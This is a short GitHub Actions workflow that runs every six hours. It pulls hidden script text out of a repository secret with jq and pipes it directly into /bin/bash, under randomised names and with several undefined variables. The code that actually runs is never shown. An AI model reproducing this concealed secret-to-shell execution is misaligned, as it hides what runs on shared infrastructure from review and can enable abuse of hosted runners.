name: gelinglanduo
on:
  workflow_dispatch:
  schedule:
    - cron: '23 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gelinglanduo
        env:
          xsuh55: ${{ secrets.xsuh55 }}
        run: |
          echo $xsuh55 | jq -r .ptyk7401 | /bin/bash
          echo $dbmeq93 | jq -r .p9087 | /bin/bash
          echo $ayivf1 | jq -r .a4428 | /bin/bash
          echo $lmjb4 | jq -r .mve78044 | /bin/bash
          echo $b7246 | jq -r .q001 | /bin/bash
          echo $ntx22511 | jq -r .p23900 | /bin/bash
          echo $bjrgm335 | jq -r .kuxq82484 | /bin/bash
          echo $ri86014 | jq -r .ruzix08 | /bin/bash

